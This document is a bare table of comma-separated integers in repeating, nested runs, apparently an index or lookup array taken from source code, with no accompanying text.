6400, 6728, 3916, 6484, 6812, 7021, 4136, 4247,
4292, 4328, 4356, 1926, 3497, 6301, 3717, 6421,
6749, 3937, 6505, 6833, 7042, 4157, 6561, 6889,
7098, 7223, 4377, 4467, 4512, 4548, 4576, 4597,
1992, 3512, 6316, 3732, 6436, 6764, 3952, 6520,
6848, 7057, 4172, 6576, 6904, 7113, 7238, 4392,
6611, 6939, 7148, 7273, 7342, 4612, 4687, 4732,
4768, 4796, 4817, 4832, 2058, 2541, 4872, 2662,
4881, 4926, 2772, 4889, 4934, 4970, 2871, 4896,
4941, 4977, 5005, 2959, 4902, 4947, 4983, 5011,
5032, 3036, 4907, 4952, 4988, 5016, 5037, 5052,
3102, 2079, 2089, 2098, 2106, 2113, 2119, 2124,
103, 1666, 3371, 3591, 1732, 3416, 6220, 3636,
3811, 3856, 1798, 3452, 6256, 3672, 6376, 6704,
3892, 4031, 4076, 4112, 1864, 3480, 6284, 3700,
6404, 6732, 3920, 6488, 6816, 7025, 4140, 4251,
4296, 4332, 4360, 1930, 3501, 6305, 3721, 6425,
6753, 3941, 6509, 6837, 7046, 4161, 6565, 6893,
7102, 7227, 4381, 4471, 4516, 4552, 4580, 4601,
1996, 3516, 6320, 3736, 6440, 6768, 3956, 6524,
6852, 7061, 4176, 6580, 6908, 7117, 7242, 4396,
6615, 6943, 7152, 7277, 7346, 4616, 4691, 4736,
4772, 4800, 4821, 4836, 2062, 3526, 6330, 3746,
6450, 6778, 3966, 6534, 6862, 7071, 4186, 6590,
6918, 7127, 7252, 4406, 6625, 6953, 7162, 7287,
7356, 4626, 1606, 1606, 1606, 1606, 1606, 1605,
1606, 4911, 4956, 4992, 5020, 5041, 5056, 1606,
2128, 2552, 5092, 2673, 5101, 5146, 2783, 5109,
5154, 5190, 2882, 5116, 5161, 5197, 5225, 2970,
5122, 5167, 5203, 5231, 5252, 3047, 5127, 5172,
5208, 5236, 5257, 5272, 3113, 5131, 5176, 5212,
5240, 5261, 5276, 1606, 3168, 2145, 2155, 2164,
2172, 2179, 2185, 2190, 2194, 115, 175, 2556,
2677, 187, 2557, 5306, 2678, 2787, 2788, 199,
2558, 5307, 2679, 5316, 5361, 2789, 2886, 2887,
2888, 211, 2559, 5308, 2680, 5317, 5362, 2790,
5325, 5370, 5406, 2889, 2974, 2975, 2976, 2977,
223, 2560, 5309, 2681, 5318, 5363, 2791, 5326,
5371, 5407, 2890, 5333, 5378, 5414, 5442, 2978,
3051, 3052, 3053, 3054, 3055, 235, 2561, 5310,
2682, 5319, 5364, 2792, 5327, 5372, 5408, 2891,
5334, 5379, 5415, 5443, 2979, 5340, 5385, 5421,
5449, 5470, 3056, 3117, 3118, 3119, 3120, 3121,
3122, 247, 2562, 5311, 2683, 5320, 5365, 2793,
5328, 5373, 5409, 2892, 5335, 5380, 5416, 5444,
2980, 5341, 5386, 5422, 5450, 5471, 3057, 5346,
5391, 5427, 5455, 5476, 5491, 3123, 3172, 3173,
3174, 3175, 3176, 3177, 3178, 259, 2563, 5312,
2684, 5321, 5366, 2794, 5329, 5374, 5410, 2893,
5336, 5381, 5417, 5445, 2981, 5342, 5387, 5423,
5451, 5472, 3058, 5347, 5392, 5428, 5456, 5477,
5492, 3124, 5351, 5396, 5432, 5460, 5481, 5496,
1606, 3179, 3216, 3217, 3218, 3219, 3220, 3221,
3222, 3223, 271, 275, 2204, 276, 2205, 2215,
277, 2206, 2216, 2225, 278, 2207, 2217, 2226,
2234, 279, 2208, 2218, 2227, 2235, 2242, 280,
2209, 2219, 2228, 2236, 2243, 2249, 281, 2210,
2220, 2229, 2237, 2244, 2250, 2255, 282, 2211,
2221, 2230, 2238, 2245, 2251, 2256, 2260, 283,
119, 120, 121, 122, 123, 124, 125, 126,
127, 20, 176, 2476, 188, 32, 176, 2567,
2688, 188, 2487, 2798, 2608, 200, 200, 44,
176, 2567, 2688, 188, 2568, 5526, 2689, 2798,
2799, 200, 2498, 2897, 2619, 2897, 2898, 2729,
212, 212, 212, 56, 176, 2567, 2688, 188,
2568, 5526, 2689, 2798, 2799, 200, 2569, 5527,
2690, 5536, 5581, 2800, 2897, 2898, 2899, 212,
2509, 2985, 2630, 2985, 2986, 2740, 2985, 2986,
2987, 2839, 224, 224, 224, 224, 68, 176,
2567, 2688, 188, 2568, 5526, 2689, 2798, 2799,
200, 2569, 5527, 2690, 5536, 5581, 2800, 2897,
2898, 2899, 212, 2570, 5528, 2691, 5537, 5582,
2801, 5545, 5590, 5626, 2900, 2985, 2986, 2987,
2988, 224, 2520, 3062, 2641, 3062, 3063, 2751,
3062, 3063, 3064, 2850, 3062, 3063, 3064, 3065,
2938, 236, 236, 236, 236, 236, 80, 176,
2567, 2688, 188, 2568, 5526, 2689, 2798, 2799,
200, 2569, 5527, 2690, 5536, 5581, 2800, 2897,
2898, 2899, 212, 2570, 5528, 2691, 5537, 5582,
2801, 5545, 5590, 5626, 2900, 2985, 2986, 2987,
2988, 224, 2571, 5529, 2692, 5538, 5583, 2802,
5546, 5591, 5627, 2901, 5553, 5598, 5634, 5662,
2989, 3062, 3063, 3064, 3065, 3066, 236, 2531,
3128, 2652, 3128, 3129, 2762, 3128, 3129, 3130,
2861, 3128, 3129, 3130, 3131, 2949, 3128, 3129,
3130, 3131, 3132, 3026, 248, 248, 248, 248,
248, 248, 92, 176, 2567, 2688, 188, 2568,
5526, 2689, 2798, 2799, 200, 2569, 5527, 2690,
5536, 5581, 2800, 2897, 2898, 2899, 212, 2570,
5528, 2691, 5537, 5582, 2801, 5545, 5590, 5626,
2900, 2985, 2986, 2987, 2988, 224, 2571, 5529,
2692, 5538, 5583, 2802, 5546, 5591, 5627, 2901,
5553, 5598, 5634, 5662, 2989, 3062, 3063, 3064,
3065, 3066, 236, 2572, 5530, 2693, 5539, 5584,
2803, 5547, 5592, 5628, 2902, 5554, 5599, 5635,
5663, 2990, 5560, 5605, 5641, 5669, 5690, 3067,
3128, 3129, 3130, 3131, 3132, 3133, 248, 2542,
3183, 2663, 3183, 3184, 2773, 3183, 3184, 3185,
2872, 3183, 3184, 3185, 3186, 2960, 3183, 3184,
3185, 3186, 3187, 3037, 3183, 3184, 3185, 3186,
3187, 3188, 3103, 260, 260, 260, 260, 260,
260, 260, 104, 176, 2567, 2688, 188, 2568,
5526, 2689, 2798, 2799, 200, 2569, 5527, 2690,
5536, 5581, 2800, 2897, 2898, 2899, 212, 2570,
5528, 2691, 5537, 5582, 2801, 5545, 5590, 5626,
2900, 2985, 2986, 2987, 2988, 224, 2571, 5529,
2692, 5538, 5583, 2802, 5546, 5591, 5627, 2901,
5553, 5598, 5634, 5662, 2989, 3062, 3063, 3064,
3065, 3066, 236, 2572, 5530, 2693, 5539, 5584,
2803, 5547, 5592, 5628, 2902, 5554, 5599, 5635,
5663, 2990, 5560, 5605, 5641, 5669, 5690, 3067,
3128, 3129, 3130, 3131, 3132, 3133, 248, 2573,
5531, 2694, 5540, 5585, 2804, 5548, 5593, 5629,
2903, 5555, 5600, 5636, 5664, 2991, 5561, 5606,
5642, 5670, 5691, 3068, 5566, 5611, 5647, 5675,
5696, 5711, 3134, 3183, 3184, 3185, 3186, 3187,
3188, 3189, 260, 2553, 3227, 2674, 3227, 3228,
2784, 3227, 3228, 3229, 2883, 3227, 3228, 3229,
3230, 2971, 3227, 3228, 3229, 3230, 3231, 3048,
3227, 3228, 3229, 3230, 3231, 3232, 3114, 3227,
3228, 3229, 3230, 3231, 3232, 3233, 3169, 272,
272, 272, 272, 272, 272, 272, 272, 116,
176, 2567, 2688, 188, 2568, 5526, 2689, 2798,
2799, 200, 2569, 5527, 2690, 5536, 5581, 2800,
2897, 2898, 2899, 212, 2570, 5528, 2691, 5537,
5582, 2801, 5545, 5590, 5626, 2900, 2985, 2986,
2987, 2988, 224, 2571, 5529, 2692, 5538, 5583,
2802, 5546, 5591, 5627, 2901, 5553, 5598, 5634,
5662, 2989, 3062, 3063, 3064, 3065, 3066, 236,
2572, 5530, 2693, 5539, 5584, 2803, 5547, 5592,
5628, 2902, 5554, 5599, 5635, 5663, 2990, 5560,
5605, 5641, 5669, 5690, 3067, 3128, 3129, 3130,
3131, 3132, 3133, 248, 2573, 5531, 2694, 5540,
5585, 2804, 5548, 5593, 5629, 2903, 5555, 5600,
5636, 5664, 2991, 5561, 5606, 5642, 5670, 5691,
3068, 5566, 5611, 5647, 5675, 5696, 5711, 3134,
3183, 3184, 3185, 3186, 3187, 3188, 3189, 260,
2574, 5532, 2695, 5541, 5586, 2805, 5549, 5594,
5630, 2904, 5556, 5601, 5637, 5665, 2992, 5562,
5607, 5643, 5671, 5692, 3069, 5567, 5612, 5648,
5676, 5697, 5712, 3135, 5571, 5616, 5652, 5680,
5701, 5716, 1606, 3190, 3227, 3228, 3229, 3230,
3231, 3232, 3233, 3234, 272, 2564, 3260, 2685,
3260, 3261, 2795, 3260, 3261, 3262, 2894, 3260,
3261, 3262, 3263, 2982, 3260, 3261, 3262, 3263,
3264, 3059, 3260, 3261, 3262, 3263, 3264, 3265,
3125, 3260, 3261, 3262, 3263, 3264, 3265, 3266,
3180, 3260, 3261, 3262, 3263, 3264, 3265, 3266,
3267, 3224, 284, 284, 284, 284, 284, 284,
284, 284, 284, 128, 176, 287, 288, 188,
287, 2270, 288, 289, 289, 200, 287, 2270,
288, 2271, 2281, 289, 290, 290, 290, 212,
287, 2270, 288, 2271, 2281, 289, 2272, 2282,
2291, 290, 291, 291, 291, 291, 224, 287,
2270, 288, 2271, 2281, 289, 2272, 2282, 2291,
290, 2273, 2283, 2292, 2300, 291, 292, 292,
292, 292, 292, 236, 287, 2270, 288, 2271,
2281, 289, 2272, 2282, 2291, 290, 2273, 2283,
2292, 2300, 291, 2274, 2284, 2293, 2301, 2308,
292, 293, 293, 293, 293, 293, 293, 248,
287, 2270, 288, 2271, 2281, 289, 2272, 2282,
2291, 290, 2273, 2283, 2292, 2300, 291, 2274,
2284, 2293, 2301, 2308, 292, 2275, 2285, 2294,
2302, 2309, 2315, 293, 294, 294, 294, 294,
294, 294, 294, 260, 287, 2270, 288, 2271,
2281, 289, 2272, 2282, 2291, 290, 2273, 2283,
2292, 2300, 291, 2274, 2284, 2293, 2301, 2308,
292, 2275, 2285, 2294, 2302, 2309, 2315, 293,
2276, 2286, 2295, 2303, 2310, 2316, 2321, 294,
295, 295, 295, 295, 295, 295, 295, 295,
272, 287, 2270, 288, 2271, 2281, 289, 2272,
2282, 2291, 290, 2273, 2283, 2292, 2300, 291,
2274, 2284, 2293, 2301, 2308, 292, 2275, 2285,
2294, 2302, 2309, 2315, 293, 2276, 2286, 2295,
2303, 2310, 2316, 2321, 294, 2277, 2287, 2296,
2304, 2311, 2317, 2322, 2326, 295, 296, 296,
296, 296, 296, 296, 296, 296, 296, 284,
131, 131, 132, 131, 132, 133, 131, 132,
133, 134, 131, 132, 133, 134, 135, 131,
132, 133, 134, 135, 136, 131, 132, 133,
134, 135, 136, 137, 131, 132, 133, 134,
135, 136, 137, 138, 131, 132, 133, 134,
135, 136, 137, 138, 139, 131, 132, 133,
134, 135, 136, 137, 138, 139, 140, 11,
167, 179, 23, 12, 1610, 2468, 1676, 24,
168, 2479, 2600, 180, 191, 1742, 192, 35,
36, 13, 1611, 2469, 1677, 25, 1621, 3326,
3546, 1687, 2480, 3766, 2601, 1743, 1753, 37,
169, 2490, 2611, 181, 2491, 3986, 2612, 2721,
2722, 193, 203, 1808, 204, 1809, 1819, 205,
47, 48, 49, 14, 1612, 2470, 1678, 26,
1622, 3327, 3547, 1688, 2481, 3767, 2602, 1744,
1754, 38, 1631, 3336, 3556, 1697, 3381, 1600,
3601, 3776, 3821, 1763, 2492, 3987, 2613, 3996,
4041, 2723, 1810, 1820, 1829, 50, 170, 2501,
2622, 182, 2502, 4206, 2623, 2732, 2733, 194,
2503, 4207, 2624, 4216, 4261, 2734, 2831, 2832,
2833, 206, 215, 1874, 216, 1875, 1885, 217,
1876, 1886, 1895, 218, 59, 60, 61, 62,
15, 1613, 2471, 1679, 27, 1623, 3328, 3548,
1689, 2482, 3768, 2603, 1745, 1755, 39, 1632,
3337, 3557, 1698, 3382, 6186, 3602, 3777, 3822,
1764, 2493, 3988, 2614, 3997, 4042, 2724, 1811,
1821, 1830, 51, 1640, 3345, 3565, 1706, 3390,
6194, 3610, 3785, 3830, 1772, 3426, 6230, 3646,
6350, 1601, 3866, 4005, 4050, 4086, 1838, 2504,
4208, 2625, 4217, 4262, 2735, 4225, 4270, 4306,
2834, 1877, 1887, 1896, 1904, 63, 171, 2512,
2633, 183, 2513, 4426, 2634, 2743, 2744, 195,
2514, 4427, 2635, 4436, 4481, 2745, 2842, 2843,
2844, 207, 2515, 4428, 2636, 4437, 4482, 2746,
4445, 4490, 4526, 2845, 2930, 2931, 2932, 2933,
219, 227, 1940, 228, 1941, 1951, 229, 1942,
1952, 1961, 230, 1943, 1953, 1962, 1970, 231,
71, 72, 73, 74, 75, 16, 1614, 2472,
1680, 28, 1624, 3329, 3549, 1690, 2483, 3769,
2604, 1746, 1756, 40, 1633, 3338, 3558, 1699,
3383, 6187, 3603, 3778, 3823, 1765, 2494, 3989,
2615, 3998, 4043, 2725, 1812, 1822, 1831, 52,
1641, 3346, 3566, 1707, 3391, 6195, 3611, 3786,
3831, 1773, 3427, 6231, 3647, 6351, 6679, 3867,
4006, 4051, 4087, 1839, 2505, 4209, 2626, 4218,
4263, 2736, 4226, 4271, 4307, 2835, 1878, 1888,
1897, 1905, 64, 1648, 3353, 3573, 1714, 3398,
6202, 3618, 3793, 3838, 1780, 3434, 6238, 3654,
6358, 6686, 3874, 4013, 4058, 4094, 1846, 3462,
6266, 3682, 6386, 6714, 3902, 6470, 6798, 1602,
4122, 4233, 4278, 4314, 4342, 1912, 2516, 4429,
2637, 4438, 4483, 2747, 4446, 4491, 4527, 2846,
4453, 4498, 4534, 4562, 2934, 1944, 1954, 1963,
1971, 1978, 76, 172, 2523, 2644, 184, 2524,
4646, 2645, 2754, 2755, 196, 2525, 4647, 2646,
4656, 4701, 2756, 2853, 2854, 2855, 208, 2526,
4648, 2647, 4657, 4702, 2757, 4665, 4710, 4746,
2856, 2941, 2942, 2943, 2944, 220, 2527, 4649,
2648, 4658, 4703, 2758, 4666, 4711, 4747, 2857,
4673, 4718, 4754, 4782, 2945, 3018, 3019, 3020,
3021, 3022, 232, 239, 2006, 240, 2007, 2017,
241, 2008, 2018, 2027, 242, 2009, 2019, 2028,
2036, 243, 2010, 2020, 2029, 2037, 2044, 244,
83, 84, 85, 86, 87, 88, 17, 1615,
2473, 1681, 29, 1625, 3330, 3550, 1691, 2484,
3770, 2605, 1747, 1757, 41, 1634, 3339, 3559,
1700, 3384, 6188, 3604, 3779, 3824, 1766, 2495,
3990, 2616, 3999, 4044, 2726, 1813, 1823, 1832,
53, 1642, 3347, 3567, 1708, 3392, 6196, 3612,
3787, 3832, 1774, 3428, 6232, 3648, 6352, 6680,
3868, 4007, 4052, 4088, 1840, 2506, 4210, 2627,
4219, 4264, 2737, 4227, 4272, 4308, 2836, 1879,
1889, 1898, 1906, 65, 1649, 3354, 3574, 1715,
3399, 6203, 3619, 3794, 3839, 1781, 3435, 6239,
3655, 6359, 6687, 3875, 4014, 4059, 4095, 1847,
3463, 6267, 3683, 6387, 6715, 3903, 6471, 6799,
7008, 4123, 4234, 4279, 4315, 4343, 1913, 2517,
4430, 2638, 4439, 4484, 2748, 4447, 4492, 4528,
2847, 4454, 4499, 4535, 4563, 2935, 1945, 1955,
1964, 1972, 1979, 77, 1655, 3360, 3580, 1721,
3405, 6209, 3625, 3800, 3845, 1787, 3441, 6245,
3661, 6365, 6693, 3881, 4020, 4065, 4101, 1853,
3469, 6273, 3689, 6393, 6721, 3909, 6477, 6805,
7014, 4129, 4240, 4285, 4321, 4349, 1919, 3490,
6294, 3710, 6414, 6742, 3930, 6498, 6826, 7035,
4150, 6554, 6882, 7091, 1603, 4370, 4460, 4505,
4541, 4569, 4590, 1985, 2528, 4650, 2649, 4659,
4704, 2759, 4667, 4712, 4748, 2858, 4674, 4719,
4755, 4783, 2946, 4680, 4725, 4761, 4789, 4810,
3023, 2011, 2021, 2030, 2038, 2045, 2051, 89,
173, 2534, 2655, 185, 2535, 4866, 2656, 2765,
2766, 197, 2536, 4867, 2657, 4876, 4921, 2767,
2864, 2865, 2866, 209, 2537, 4868, 2658, 4877,
4922, 2768, 4885, 4930, 4966, 2867, 2952, 2953,
2954, 2955, 221, 2538, 4869, 2659, 4878, 4923,
2769, 4886, 4931, 4967, 2868, 4893, 4938, 4974,
5002, 2956, 3029, 3030, 3031, 3032, 3033, 233,
2539, 4870, 2660, 4879, 4924, 2770, 4887, 4932,
4968, 2869, 4894, 4939, 4975, 5003, 2957, 4900,
4945, 4981, 5009, 5030, 3034, 3095, 3096, 3097,
3098, 3099, 3100, 245, 251, 2072, 252, 2073,
2083, 253, 2074, 2084, 2093, 254, 2075, 2085,
2094, 2102, 255, 2076, 2086, 2095, 2103, 2110,
256, 2077, 2087, 2096, 2104, 2111, 2117, 257,
95, 96, 97, 98, 99, 100, 101, 18,
1616, 2474, 1682, 30, 1626, 3331, 3551, 1692,
2485, 3771, 2606, 1748, 1758, 42, 1635, 3340,
3560, 1701, 3385, 6189, 3605, 3780, 3825, 1767,
2496, 3991, 2617, 4000, 4045, 2727, 1814, 1824,
1833, 54, 1643, 3348, 3568, 1709, 3393, 6197,
3613, 3788, 3833, 1775, 3429, 6233, 3649, 6353,
6681, 3869, 4008, 4053, 4089, 1841, 2507, 4211,
2628, 4220, 4265, 2738, 4228, 4273, 4309, 2837,
1880, 1890, 1899, 1907, 66, 1650, 3355, 3575,
1716, 3400, 6204, 3620, 3795, 3840, 1782, 3436,
6240, 3656, 6360, 6688, 3876, 4015, 4060, 4096,
1848, 3464, 6268, 3684, 6388, 6716, 3904, 6472,
6800, 7009, 4124, 4235, 4280, 4316, 4344, 1914,
2518, 4431, 2639, 4440, 4485, 2749, 4448, 4493,
4529, 2848, 4455, 4500, 4536, 4564, 2936, 1946,
1956, 1965, 1973, 1980, 78, 1656, 3361, 3581,
1722, 3406, 6210, 3626, 3801, 3846, 1788, 3442,
6246, 3662, 6366, 6694, 3882, 4021, 4066, 4102,
1854, 3470, 6274, 3690, 6394, 6722, 3910, 6478,
6806, 7015, 4130, 4241, 4286, 4322, 4350, 1920,
3491, 6295, 3711, 6415, 6743, 3931, 6499, 6827,
7036, 4151, 6555, 6883, 7092, 7217, 4371, 4461,
4506, 4542, 4570, 4591, 1986, 2529, 4651, 2650,
4660, 4705, 2760, 4668, 4713, 4749, 2859, 4675,
4720, 4756, 4784, 2947, 4681, 4726, 4762, 4790,
4811, 3024, 2012, 2022, 2031, 2039, 2046, 2052,
90, 1661, 3366, 3586, 1727, 3411, 6215, 3631,
3806, 3851, 1793, 3447, 6251, 3667, 6371, 6699,
3887, 4026, 4071, 4107, 1859, 3475, 6279, 3695,
6399, 6727, 3915, 6483, 6811, 7020, 4135, 4246,
4291, 4327, 4355, 1925, 3496, 6300, 3716, 6420,
6748, 3936, 6504, 6832, 7041, 4156, 6560, 6888,
7097, 7222, 4376, 4466, 4511, 4547, 4575, 4596,
1991, 3511, 6315, 3731, 6435, 6763, 3951, 6519,
6847, 7056, 4171, 6575, 6903, 7112, 7237, 4391,
6610, 6938, 7147, 7272, 1604, 4611, 4686, 4731,
4767, 4795, 4816, 4831, 2057, 2540, 4871, 2661,
4880, 4925, 2771, 4888, 4933, 4969, 2870, 4895,
4940, 4976, 5004, 2958, 4901, 4946, 4982, 5010,
5031, 3035, 4906, 4951, 4987, 5015, 5036, 5051,
3101, 2078, 2088, 2097, 2105, 2112, 2118, 2123,
102, 174, 2545, 2666, 186, 2546, 5086, 2667,
2776, 2777, 198, 2547, 5087, 2668, 5096, 5141,
2778, 2875, 2876, 2877, 210, 2548, 5088, 2669,
5097, 5142, 2779, 5105, 5150, 5186, 2878, 2963,
2964, 2965, 2966, 222, 2549, 5089, 2670, 5098,
5143, 2780, 5106, 5151, 5187, 2879, 5113, 5158,
5194, 5222, 2967, 3040, 3041, 3042, 3043, 3044,
234, 2550, 5090, 2671, 5099, 5144, 2781, 5107,
5152, 5188, 2880, 5114, 5159, 5195, 5223, 2968,
5120, 5165, 5201, 5229, 5250, 3045, 3106, 3107,
3108, 3109, 3110, 3111, 246, 2551, 5091, 2672,
5100, 5145, 2782, 5108, 5153, 5189, 2881, 5115,
5160, 5196, 5224, 2969, 5121, 5166, 5202, 5230,
5251, 3046, 5126, 5171, 5207, 5235, 5256, 5271,
3112, 3161, 3162, 3163, 3164, 3165, 3166, 3167,
258, 263, 2138, 264, 2139, 2149, 265, 2140,
2150, 2159, 266, 2141, 2151, 2160, 2168, 267,
2142, 2152, 2161, 2169, 2176, 268, 2143, 2153,
2162, 2170, 2177, 2183, 269, 2144, 2154, 2163,
2171, 2178, 2184, 2189, 270, 107, 108, 109,
110, 111, 112, 113, 114, 19, 1617, 2475,
1683, 31, 1627, 3332, 3552, 1693, 2486, 3772,
2607, 1749, 1759, 43, 1636, 3341, 3561, 1702,
3386, 6190, 3606, 3781, 3826, 1768, 2497, 3992,
2618, 4001, 4046, 2728, 1815, 1825, 1834, 55,
1644, 3349, 3569, 1710, 3394, 6198, 3614, 3789,
3834, 1776, 3430, 6234, 3650, 6354, 6682, 3870,
4009, 4054, 4090, 1842, 2508, 4212, 2629, 4221,
4266, 2739, 4229, 4274, 4310, 2838, 1881, 1891,
1900, 1908, 67, 1651, 3356, 3576, 1717, 3401,
6205, 3621, 3796, 3841, 1783, 3437, 6241, 3657,
6361, 6689, 3877, 4016, 4061, 4097, 1849, 3465,
6269, 3685, 6389, 6717, 3905, 6473, 6801, 7010,
4125, 4236, 4281, 4317, 4345, 1915, 2519, 4432,
2640, 4441, 4486, 2750, 4449, 4494, 4530, 2849,
4456, 4501, 4537, 4565, 2937, 1947, 1957, 1966,
1974, 1981, 79, 1657, 3362, 3582, 1723, 3407,
6211, 3627, 3802, 3847, 1789, 3443, 6247, 3663,
6367, 6695, 3883, 4022, 4067, 4103, 1855, 3471,
6275, 3691, 6395, 6723, 3911, 6479, 6807, 7016,
4131, 4242, 4287, 4323, 4351, 1921, 3492, 6296,
3712, 6416, 6744, 3932, 6500, 6828, 7037, 4152,
6556, 6884, 7093, 7218, 4372, 4462, 4507, 4543,
4571, 4592, 1987, 2530, 4652, 2651, 4661, 4706,
2761, 4669, 4714, 4750, 2860, 4676, 4721, 4757,
4785, 2948, 4682, 4727, 4763, 4791, 4812, 3025,
2013, 2023, 2032, 2040, 2047, 2053, 91, 1662,
3367, 3587, 1728, 3412, 6216, 3632, 3807, 3852,
1794, 3448, 6252, 3668, 6372, 6700, 3888, 4027,
4072, 4108, 1860, 3476, 6280, 3696, 6400, 6728,
3916, 6484, 6812, 7021, 4136, 4247, 4292, 4328,
4356, 1926, 3497, 6301, 3717, 6421, 6749, 3937,
6505, 6833, 7042, 4157, 6561, 6889, 7098, 7223,
4377, 4467, 4512, 4548, 4576, 4597, 1992, 3512,
6316, 3732, 6436, 6764, 3952, 6520, 6848, 7057,
4172, 6576, 6904, 7113, 7238, 4392, 6611, 6939,
7148, 7273, 7342, 4612, 4687, 4732, 4768, 4796,
4817, 4832, 2058, 2541, 4872, 2662, 4881, 4926,
2772, 4889, 4934, 4970, 2871, 4896, 4941, 4977,
5005, 2959, 4902, 4947, 4983, 5011, 5032, 3036,
4907, 4952, 4988, 5016, 5037, 5052, 3102, 2079,
2089, 2098, 2106, 2113, 2119, 2124, 103, 1666,
3371, 3591, 1732, 3416, 6220, 3636, 3811, 3856,
1798, 3452, 6256, 3672, 6376, 6704, 3892, 4031,
4076, 4112, 1864, 3480, 6284, 3700, 6404, 6732,
3920, 6488, 6816, 7025, 4140, 4251, 4296, 4332,
4360, 1930, 3501, 6305, 3721, 6425, 6753, 3941,
6509, 6837, 7046, 4161, 6565, 6893, 7102, 7227,
4381, 4471, 4516, 4552, 4580, 4601, 1996, 3516,
6320, 3736, 6440, 6768, 3956, 6524, 6852, 7061,
4176, 6580, 6908, 7117, 7242, 4396, 6615, 6943,
7152, 7277, 7346, 4616, 4691, 4736, 4772, 4800,
4821, 4836, 2062, 3526, 6330, 3746, 6450, 6778,
3966, 6534, 6862, 7071, 4186, 6590, 6918, 7127,
7252, 4406, 6625, 6953, 7162, 7287, 7356, 4626,
6645, 6973, 7182, 7307, 7376, 1605, 4846, 4911,
4956, 4992, 5020, 5041, 5056, 5066, 2128, 2552,
5092, 2673, 5101, 5146, 2783, 5109, 5154, 5190,
2882, 5116, 5161, 5197, 5225, 2970, 5122, 5167,
5203, 5231, 5252, 3047, 5127, 5172, 5208, 5236,
5257, 5272, 3113, 5131, 5176, 5212, 5240, 5261,
5276, 5286, 3168, 2145, 2155, 2164, 2172, 2179,
2185, 2190, 2194, 115, 175, 2556, 2677, 187,
2557, 5306, 2678, 2787, 2788, 199, 2558, 5307,
2679, 5316, 5361, 2789, 2886, 2887, 2888, 211,
2559, 5308, 2680, 5317, 5362, 2790, 5325, 5370,
5406, 2889, 2974, 2975, 2976, 2977, 223, 2560,
5309, 2681, 5318, 5363, 2791, 5326, 5371, 5407,
2890, 5333, 5378, 5414, 5442, 2978, 3051, 3052,
3053, 3054, 3055, 235, 2561, 5310, 2682, 5319,
5364, 2792, 5327, 5372, 5408, 2891, 5334, 5379,
5415, 5443, 2979, 5340, 5385, 5421, 5449, 5470,
3056, 3117, 3118, 3119, 3120, 3121, 3122, 247,
2562, 5311, 2683, 5320, 5365, 2793, 5328, 5373,
5409, 2892, 5335, 5380, 5416, 5444, 2980, 5341,
5386, 5422, 5450, 5471, 3057, 5346, 5391, 5427,
5455, 5476, 5491, 3123, 3172, 3173, 3174, 3175,
3176, 3177, 3178, 259, 2563, 5312, 2684, 5321,
5366, 2794, 5329, 5374, 5410, 2893, 5336, 5381,
5417, 5445, 2981, 5342, 5387, 5423, 5451, 5472,
3058, 5347, 5392, 5428, 5456, 5477, 5492, 3124,
5351, 5396, 5432, 5460, 5481, 5496, 5506, 3179,
3216, 3217, 3218, 3219, 3220, 3221, 3222, 3223,
271, 275, 2204, 276, 2205, 2215, 277, 2206,
2216, 2225, 278, 2207, 2217, 2226, 2234, 279,
2208, 2218, 2227, 2235, 2242, 280, 2209, 2219,
2228, 2236, 2243, 2249, 281, 2210, 2220, 2229,
2237, 2244, 2250, 2255, 282, 2211, 2221, 2230,
2238, 2245, 2251, 2256, 2260, 283, 119, 120,
121, 122, 123, 124, 125, 126, 127, 20,
1618, 2476, 1684, 32, 1628, 3333, 3553, 1694,
2487, 3773, 2608, 1750, 1760, 44, 1637, 3342,
3562, 1703, 3387, 6191, 3607, 3782, 3827, 1769,
2498, 3993, 2619, 4002, 4047, 2729, 1816, 1826,
1835, 56, 1645, 3350, 3570, 1711, 3395, 6199,
3615, 3790, 3835, 1777, 3431, 6235, 3651, 6355,
6683, 3871, 4010, 4055, 4091, 1843, 2509, 4213,
2630, 4222, 4267, 2740, 4230, 4275, 4311, 2839,
1882, 1892, 1901, 1909, 68, 1652, 3357, 3577,
1718, 3402, 6206, 3622, 3797, 3842, 1784, 3438,
6242, 3658, 6362, 6690, 3878, 4017, 4062, 4098,
1850, 3466, 6270, 3686, 6390, 6718, 3906, 6474,
6802, 7011, 4126, 4237, 4282, 4318, 4346, 1916,
2520, 4433, 2641, 4442, 4487, 2751, 4450, 4495,
4531, 2850, 4457, 4502, 4538, 4566, 2938, 1948,
1958, 1967, 1975, 1982, 80, 1658, 3363, 3583,
1724, 3408, 6212, 3628, 3803, 3848, 1790, 3444,
6248, 3664, 6368, 6696, 3884, 4023, 4068, 4104,
1856, 3472, 6276, 3692, 6396, 6724, 3912, 6480,
6808, 7017, 4132, 4243, 4288, 4324, 4352, 1922,
3493, 6297, 3713, 6417, 6745, 3933, 6501, 6829,
7038, 4153, 6557, 6885, 7094, 7219, 4373, 4463,
4508, 4544, 4572, 4593, 1988, 2531, 4653, 2652,
4662, 4707, 2762, 4670, 4715, 4751, 2861, 4677,
4722, 4758, 4786, 2949, 4683, 4728, 4764, 4792,
4813, 3026, 2014, 2024, 2033, 2041, 2048, 2054,
92, 1663, 3368, 3588, 1729, 3413, 6217, 3633,
3808, 3853, 1795, 3449, 6253, 3669, 6373, 6701,
3889, 4028, 4073, 4109, 1861, 3477, 6281, 3697,
6401, 6729, 3917, 6485, 6813, 7022, 4137, 4248,
4293, 4329, 4357, 1927, 3498, 6302, 3718, 6422,
6750, 3938, 6506, 6834, 7043, 4158, 6562, 6890,
7099, 7224, 4378, 4468, 4513, 4549, 4577, 4598,
1993, 3513, 6317, 3733, 6437, 6765, 3953, 6521,
6849, 7058, 4173, 6577, 6905, 7114, 7239, 4393,
6612, 6940, 7149, 7274, 7343, 4613, 4688, 4733,
4769, 4797, 4818, 4833, 2059, 2542, 4873, 2663,
4882, 4927, 2773, 4890, 4935, 4971, 2872, 4897,
4942, 4978, 5006, 2960, 4903, 4948, 4984, 5012,
5033, 3037, 4908, 4953, 4989, 5017, 5038, 5053,
3103, 2080, 2090, 2099, 2107, 2114, 2120, 2125,
104, 1667, 3372, 3592, 1733, 3417, 6221, 3637,
3812, 3857, 1799, 3453, 6257, 3673, 6377, 6705,
3893, 4032, 4077, 4113, 1865, 3481, 6285, 3701,
6405, 6733, 3921, 6489, 6817, 7026, 4141, 4252,
4297, 4333, 4361, 1931, 3502, 6306, 3722, 6426,
6754, 3942, 6510, 6838, 7047, 4162, 6566, 6894,
7103, 7228, 4382, 4472, 4517, 4553, 4581, 4602,
1997, 3517, 6321, 3737, 6441, 6769, 3957, 6525,
6853, 7062, 4177, 6581, 6909, 7118, 7243, 4397,
